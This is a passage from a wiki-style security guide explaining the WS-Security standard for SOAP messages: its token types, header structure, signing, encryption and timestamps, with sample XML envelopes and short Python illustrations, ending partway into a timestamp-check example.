SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/&amp;lt;/u&amp;gt;), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
The WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. The current version is 1.0, and work on version 1.1 of the specification is under way, expected to finish in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
The flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols as they are developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standard are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens passed in WSS messages, and the ways of attaching them to the message, may vary substantially. At a high level, the WSS standard defines three types of security tokens attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile documents, which define the additional token attributes and elements needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, where each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as authenticity, integrity, and freshness, and to initiate decryption of any encrypted message parts. This concept stands in stark contrast to traditional channel security, which methodically applies a pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents: one core document, which defines how security headers may be included in a SOAP envelope and describes all the high-level blocks that must be present in a valid security header, plus profile documents, which have the dual task of extending the definitions for the token types they deal with, providing additional attributes and elements, and defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
Core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt;, which specifies how X.509 certificates may be passed in the BinarySecurityToken specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
The WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc.; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides a straightforward conversion from binary to ASCII format and back. The example below demonstrates what binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
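The round trip is easy to demonstrate with Python's standard library (the sample bytes below stand in for a real binary token, such as a DER-encoded certificate):

```python
import base64

# 32 arbitrary bytes standing in for binary token material.
raw = bytes(range(32))

# Base64 yields plain ASCII, safe to embed as XML element text.
encoded = base64.b64encode(raw).decode("ascii")

# Decoding unambiguously restores the original bytes.
assert base64.b64decode(encoded) == raw
assert encoded.isascii()
```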
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care, about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1) or roles (for SOAP 1.2). Their contents may also refer to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. The WSS security header itself has a loose structure, as the specification does not require any elements to be present – so the minimal header with an empty message will look like this:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, the header must carry some information that will help secure the message. This means including one or more security tokens (see 0) with references, plus XML Signature and XML Encryption elements if the message is signed and/or encrypted. So, a typical header will look more like the following: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms for passing a username and, optionally, a password; the latter is described in the Username Token Profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted over a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with a nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing the password digest: &lt;br /&gt;
&lt;br /&gt;
 Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )&lt;br /&gt;
&lt;br /&gt;
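The digest computation above can be sketched with Python's standard library. Per the formula, the raw nonce bytes, the created timestamp, and the password are concatenated before hashing (the nonce itself is Base64-encoded separately when placed in the message); the function and variable names below are illustrative, not part of any WSS API:&lt;br /&gt;

```python
import base64
import hashlib
import os
from datetime import datetime, timezone

def password_digest(nonce: bytes, created: str, password: str) -> str:
    """Compute Password_Digest = Base64(SHA-1(nonce + created + password))."""
    h = hashlib.sha1(nonce + created.encode("utf-8") + password.encode("utf-8"))
    return base64.b64encode(h.digest()).decode("ascii")

# Illustrative usage: a random 16-byte nonce and a UTC creation timestamp.
nonce = os.urandom(16)
created = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
digest = password_digest(nonce, created, "secret")
print(digest)
```

Because the receiver knows the nonce and created values from the message, it can recompute the same digest against its stored clear-text password and compare.&lt;br /&gt;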
* Binary token&lt;br /&gt;
&lt;br /&gt;
Binary tokens are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines the BinarySecurityToken element, while profile documents specify additional attributes and sub-elements for attaching various token types. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;&lt;br /&gt;
         MIICtzCCAi...&lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based token, but primarily for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, the SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
 	&amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure the message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens passed in the message, or to identify signed and encrypted message parts, the core specification adopts a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs be unique within the scope of the XML document where they are defined. Its use has a significant advantage for intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, the XML Signature and Encryption specifications do not allow for attribute extensibility (i.e., they have closed schemas), so, when trying to locate signature or encryption elements, the local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
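Resolving such a reference amounts to scanning the document for an element carrying the given wsu:Id value. A minimal sketch with Python's standard ElementTree, using an abbreviated envelope (the Id value reuses the one from the sample header above; the helper function name is illustrative):&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"

# Abbreviated SOAP envelope with a wsu:Id attribute on the Body.
envelope = """
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:wsu="{wsu}">
  <soap:Header/>
  <soap:Body wsu:Id="s91397860">payload</soap:Body>
</soap:Envelope>
""".format(wsu=WSU)

def find_by_wsu_id(root, wsu_id):
    """Return the first element whose wsu:Id attribute matches, or None."""
    for elem in root.iter():
        if elem.get("{%s}Id" % WSU) == wsu_id:
            return elem
    return None

root = ET.fromstring(envelope)
body = find_by_wsu_id(root, "s91397860")
print(body.tag)
```

Note that this scan works without any knowledge of the message's schema, which is exactly the advantage the specification intends for intermediaries.&lt;br /&gt;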
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;&lt;br /&gt;
             1106844369755&lt;br /&gt;
           &amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to practically any possible token type (including encryption keys, certificates, SAML assertions, etc.), both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its four possible reference types: Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML and X.509, for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps address some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e., no Enveloping or Enveloped signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, the Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
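The effect of canonicalization can be demonstrated with Python's standard library. Note an assumption: xml.etree.ElementTree.canonicalize (available since Python 3.8) implements Canonical XML 2.0 rather than the EXC-C14N that WSS recommends, but the principle is the same: semantically equivalent serializations reduce to identical bytes, and therefore to identical digests:&lt;br /&gt;

```python
import hashlib
import xml.etree.ElementTree as ET

# Two semantically equivalent serializations: attribute order differs,
# and one uses the empty-element shorthand.
doc_a = '<item b="2" a="1"/>'
doc_b = '<item a="1" b="2"></item>'

canon_a = ET.canonicalize(doc_a)
canon_b = ET.canonicalize(doc_b)

# Canonical forms are byte-identical, so their digests match -- which is
# why a signature over the canonical form survives re-serialization.
assert canon_a == canon_b
digest_a = hashlib.sha1(canon_a.encode("utf-8")).hexdigest()
digest_b = hashlib.sha1(canon_b.encode("utf-8")).hexdigest()
assert digest_a == digest_b
```

Without this step, an intermediary that merely re-serialized a message (reordering attributes, say) would break every signature over it.&lt;br /&gt;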
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform, comparable to dereferencing a pointer to an object of a specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in the earlier sample in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as the SOAP Body and the timestamp, as well as any user credentials passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element be prepended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message using overlapping signature and encryption blocks, as in this case nothing points to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For confidentiality protection, WSS relies on yet another standard, XML Encryption. Like XML-dsig, this standard operates on selected elements of the SOAP message, but it replaces the encrypted element’s data with an &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique symmetric key, which is then encrypted with the recipient’s public key and prepended to the security header in an &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with an encrypted body is shown in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP message freshness is addressed via the timestamp mechanism: each security header may contain just one such element, which states, in UTC format, the creation and expiration moments of the security header. It is important to realize that the timestamp applies to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestamp” approach: once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in the case of a legitimate change to the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address clock synchronization (which, as was already pointed out earlier, is generally not an issue in modern-day systems); this has to be addressed out-of-band as far as the WSS mechanics are concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
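A receiver's freshness check boils down to comparing the Created and Expires values against its own clock, usually with some allowance for clock skew. A minimal sketch follows, using the timestamp values from the sample header above; the 300-second skew window is an arbitrary illustrative choice, not something the specification mandates:&lt;br /&gt;

```python
from datetime import datetime, timedelta, timezone

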